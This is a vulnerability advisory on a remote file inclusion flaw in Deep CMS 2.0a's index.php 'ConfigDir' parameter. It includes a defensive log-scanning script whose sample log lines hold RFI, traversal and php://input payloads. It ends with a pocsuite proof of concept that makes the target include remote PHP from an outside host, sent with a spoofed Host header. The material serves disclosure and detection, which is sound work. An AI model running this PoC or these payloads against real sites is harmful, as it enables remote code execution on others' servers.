Deep CMS Index.PHP Remote File Inclusion Vulnerability

2007-01-07T00:00:00
ID SSV:1118
Type seebug
Reporter Root
Modified 2007-01-07T00:00:00

Description

Deep CMS is a PHP-based content management system. Deep CMS does not properly filter user-supplied URI data, so a remote attacker can exploit this vulnerability to execute arbitrary commands with the privileges of the web server process. The root cause is that the 'index.php' script performs no filtering on the user-supplied 'ConfigDir' parameter; supplying a malicious remote server as the include target can lead to execution of arbitrary PHP code with web-process privileges.

Deep CMS Deep CMS 2.0a

No detailed fix is available at this time; please watch the following link: <a href="http://wapcms.ru/" target="_blank">http://wapcms.ru/</a>
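From the defender's side, the advisory gives enough to write a log check for this issue: any request to index.php whose ConfigDir parameter carries a URL, a PHP stream wrapper or directory traversal is a candidate exploitation attempt. The following detector is an added example, not part of the Seebug advisory or of the pocsuite PoC below; the access-log lines, addresses and paths in it are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" style access-log line (only the fields we need).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# PHP stream wrappers that make include() read from something other than a
# plain local path; http/https/ftp are handled separately as remote includes.
WRAPPER_RE = re.compile(r'^\s*(?:php|data|phar|expect|file|zip|glob|compress\.\w+):', re.I)
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?):|^\s*//', re.I)
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def classify_config_dir(value):
    """Return a reason string if a ConfigDir value looks hostile, else None."""
    v = unquote(value)  # parse_qs decoded once already; this catches double encoding
    if WRAPPER_RE.match(v):
        return 'stream-wrapper'
    if REMOTE_RE.match(v):
        return 'remote-include'
    if TRAVERSAL_RE.search(v):
        return 'path-traversal'
    return None

def scan_access_log(lines):
    """Return (src_ip, status, reason, decoded_value) for suspicious index.php hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group('target'))
        if not parts.path.endswith('/index.php'):
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get('ConfigDir', []):
            reason = classify_config_dir(raw)
            if reason:
                hits.append((m.group('ip'), int(m.group('status')), reason, raw))
    return hits

# Constructed sample log (not real traffic): one RFI probe, one traversal,
# one benign request, one php:// wrapper, one unrelated static file.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jan/2007:10:15:02 +0000] "GET /index.php?ConfigDir=http://198.51.100.9/x.txt? HTTP/1.1" 200 5120',
    '198.51.100.23 - - [07/Jan/2007:10:15:07 +0000] "GET /index.php?ConfigDir=..%2F..%2F..%2Fetc HTTP/1.1" 500 311',
    '192.0.2.77 - - [07/Jan/2007:10:16:11 +0000] "GET /index.php?ConfigDir=config&page=news HTTP/1.1" 200 8820',
    '192.0.2.80 - - [07/Jan/2007:10:16:40 +0000] "GET /index.php?ConfigDir=php%3A%2F%2Finput HTTP/1.1" 200 1200',
    '192.0.2.81 - - [07/Jan/2007:10:17:01 +0000] "GET /images/logo.png HTTP/1.1" 200 4100',
]
```

A 200 response to a remote-include request (the first sample line) deserves the most attention, since it is consistent with the include having succeeded; the same check applies to the vendor fix, which should restrict ConfigDir to an allowlist of local directory names.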

#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '1118'  # ssvid
    version = '1.0'
    author = ['Disorder']
    vulDate = ''
    createDate = '2016-01-06'
    updateDate = '2016-01-06'
    references = ['http://www.sebug.net/vuldb/ssvid-1118']
    name = 'Deep CMS Index.PHP远程文件包含漏洞'
    appPowerLink = 'http://www.deep-cms.ru/'
    appName = 'Deep CMS'
    appVersion = 'Deep CMS 2.0a'
    vulType = 'Remote File Inclusion'
    desc = '''
    Deep CMS是一款基于PHP的内容管理程序。 Deep CMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'index.php'脚本对用户提交的'ConfigDir'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。
    '''
    samples = ['']

    def _attack(self):
        result = {}
        return self.parse_output(result)

    def _verify(self):
        # Verify the RFI through the ConfigDir parameter of index.php
        result = {}
        # The remote file contains: <?php echo md5('3.1416');?>
        payload = 'http://tool.scanv.com/wsl/php_verify.txt?'
        # URL used for the test request
        vulurl = '{url}/index.php?ConfigDir={evil}'.format(url=self.url, evil=payload)
        # Spoofed HTTP headers
        httphead = {
            'Host': 'www.google.com',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive'
        }
        # Send the test request
        resp = req.get(vulurl, headers=httphead, timeout=50)
        # md5('3.1416') = d4d7a6b8b3ed8ed86db2ef2cd728d8ec
        match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.content)
        # If md5('3.1416') appears in the response, the vulnerability is confirmed
        if match:
            # Return the verification details
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        # Parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)